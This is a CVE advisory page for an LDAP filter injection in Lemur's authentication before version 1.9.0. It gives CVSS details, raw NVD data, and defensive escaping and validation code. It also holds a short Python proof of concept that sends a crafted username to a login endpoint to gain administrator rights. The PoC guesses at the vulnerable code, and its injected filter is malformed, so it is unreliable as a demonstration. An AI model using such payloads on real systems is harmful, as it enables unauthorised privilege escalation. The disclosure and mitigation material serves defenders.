Security Vulnerability Report
CVE-2026-44304 CVSS 8.1 HIGH

Published: 2026-05-12 22:16:37
Last Modified: 2026-05-12 22:16:37

Description

Lemur manages TLS certificate creation. Prior to 1.9.0, Lemur's LDAP authentication module (lemur/auth/ldap.py) constructs LDAP search filters using unsanitized user input via Python string interpolation. An authenticated LDAP user can inject LDAP filter metacharacters through the username field to manipulate group membership queries and escalate their privileges to administrator. This vulnerability is fixed in 1.9.0.

CVSS Details

CVSS Score: 8.1
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Lemur < 1.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Conceptual PoC for CVE-2026-44304
# The vulnerability allows injection via the username field in LDAP auth.

import requests

# Malicious payload to inject into the username field
# This attempts to manipulate the group membership check logic
payload_username = "valid_user)(|(memberOf=cn=admins,ou=groups,dc=example,dc=com)"

# Example of how the vulnerable filter construction might look in Python (lemur/auth/ldap.py)
# username = request.json['username']
# ldap_filter = f"(uid={username})"
# Resulting filter: (uid=valid_user)(|(memberOf=cn=admins,ou=groups,dc=example,dc=com))


def exploit_ldap_injection(target_url, ldap_password):
    data = {
        "username": payload_username,
        "password": ldap_password
    }
    # Sending the malicious login request
    response = requests.post(target_url, data=data)
    if response.status_code == 200 and "admin" in response.text:
        print("Privilege escalation potentially successful!")
    else:
        print("Exploit failed or patch applied.")
```
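The defensive counterpart to the filter construction described above, as an added example (not Lemur's code and not its 1.9.0 patch): RFC 4515 escaping of the username before it is placed in a filter, plus a structural check and an input allow-list. The function names and the allow-list pattern are assumptions made for illustration; with python-ldap installed, `ldap.filter.escape_filter_chars` performs the same escaping.

```python
import re

# RFC 4515 section 3: inside an assertion value these characters must be
# written as a backslash followed by two hex digits.
_ESCAPES = {"\\": r"\5c", "*": r"\2a", "(": r"\28", ")": r"\29", "\x00": r"\00"}

# Assumed (hypothetical) username policy; adjust to the directory's naming rules.
_USERNAME_OK = re.compile(r"^[A-Za-z0-9._@-]{1,64}$")


def escape_filter_value(value: str) -> str:
    """Return value with every LDAP filter metacharacter escaped."""
    return "".join(_ESCAPES.get(ch, ch) for ch in value)


def unsafe_filter(username: str) -> str:
    """The pattern the advisory describes: raw string interpolation."""
    return f"(uid={username})"


def safe_filter(username: str) -> str:
    """Same filter, with the username treated strictly as a literal value."""
    return f"(uid={escape_filter_value(username)})"


def is_valid_username(username: str) -> bool:
    """Reject (and log) logins whose username falls outside the allow-list."""
    return bool(_USERNAME_OK.match(username))


def is_single_filter(ldap_filter: str) -> bool:
    """True if the string is exactly one balanced, parenthesised filter.
    Simplified structural check for tests and logging, not a full parser."""
    depth, i, last = 0, 0, len(ldap_filter) - 1
    while i <= last:
        ch = ldap_filter[i]
        if ch == "\\":          # skip an escaped character (\XX)
            i += 3
            continue
        if ch == "(":
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth < 0 or (depth == 0 and i != last):
                return False    # filter closed early: extra clauses follow
        i += 1
    return depth == 0 and ldap_filter.startswith("(")
```

Applied to the username string shown in the PoC, `unsafe_filter` yields two sibling clauses, while `safe_filter` yields one `uid` comparison against a literal that matches no real account.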

References

https://github.com/Netflix/lemur/security/advisories/GHSA-3r34-vq8m-39gh

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-44304", "sourceIdentifier": "[email protected]", "published": "2026-05-12T22:16:37.140", "lastModified": "2026-05-12T22:16:37.140", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Lemur manages TLS certificate creation. Prior to 1.9.0, Lemur's LDAP authentication module (lemur/auth/ldap.py) constructs LDAP search filters using unsanitized user input via Python string interpolation. An authenticated LDAP user can inject LDAP filter metacharacters through the username field to manipulate group membership queries and escalate their privileges to administrator. This vulnerability is fixed in 1.9.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-90"}]}], "references": [{"url": "https://github.com/Netflix/lemur/security/advisories/GHSA-3r34-vq8m-39gh", "source": "[email protected]"}]}}
```